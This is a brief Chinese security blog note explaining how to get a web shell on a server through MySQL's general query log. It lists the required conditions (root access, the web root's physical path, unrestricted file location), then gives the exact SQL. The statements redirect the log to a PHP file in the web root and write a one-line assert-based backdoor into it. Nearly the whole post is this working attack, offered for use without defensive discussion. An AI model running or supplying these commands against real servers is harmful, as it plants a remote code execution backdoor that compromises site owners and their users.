DYBOY's Blog

[笔记]Mysql通过日志拿shell

Mysql通过日志拿shell

emmm~有点舒服

0x00 利用条件

  1. root

  2. 网站物理路径

  3. 文件位置未被限制


0x01 SQL语句

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/dyboy.php';
select '<?php @assert($_POST["dyboy"]); ?>';
set global general_log = off;
版权声明:《 [笔记]Mysql通过日志拿shell 》为DYBOY原创文章未经允许不得转载。

 DYBOY
 作者签名:安全从业者,爱好安全产品开发,渗透测试,Web漏洞研究

发表评论:

用心评论~

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap